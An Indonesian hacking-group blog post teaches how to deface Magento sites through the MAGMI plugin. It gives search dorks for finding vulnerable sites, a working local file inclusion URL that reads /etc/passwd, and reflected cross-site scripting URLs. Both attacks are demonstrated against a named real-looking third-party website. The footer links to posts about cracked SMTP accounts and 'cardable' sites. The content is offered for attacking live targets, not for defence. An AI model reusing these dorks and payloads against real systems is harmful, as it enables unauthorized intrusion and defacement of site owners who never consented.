Deface Web Metode Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting

Written By Garooda Security Squad

Hai ART-Team family :)
Kali ini saya mo ngasi tutor yg ane sendiri masih bingung gunainnya >_<


[+] DORK :
inurl:/media/magmi/magmi/web/
inurl:/web/magmi_import_run.php
inurl:/old-site/magmi/web/
inurl:/magmi/web/magmi.php?
index of /media/magmi/magmi/web/css/

[+] VULN :

 

[+] EXPLOIT LFI :
www.NDAS.mu/[path]/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

[+] EXPLOIT XSS :
www.NDAS.mu/[path]/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E

www.NDAS.mu/[path]/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E

 [+] DEMO LFI :
http://www.gooddrop.com.au/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

[+] DEMO XSS :
http://www.gooddrop.com.au/media/magmi/magmi/web/magmi_import_run.php?%3C%2Fscript%3E%3Cscript%3Ealert%28%27HACKED+by+_MisterNotFound_%27%29%3B%3C%2Fscript%3E 



Sekian tutorial dari _MisterNotFound_
Selamat menjalani ibadah puasa Ramadhan ;)
Jangan lupa untuk like fanspage tim kami di facebook ;)
Terimakasih.
Wassalamualaikum Wr. Wb.

Share :

You may like these posts :

• 
  Review Aplikasi Granny Rewards penghasil dollar gratis, aplikasi terbaru 2019
• 
  Jual Snack Online Pengiriman Keseluruh Indonesia (Nm Snack)
• 
  Free SMTP Crack Accounts 2019 Bagi-Bagi Akun SMTP Gratis
• 
  Share List Cardable Sites 2019 With Received All Payment Method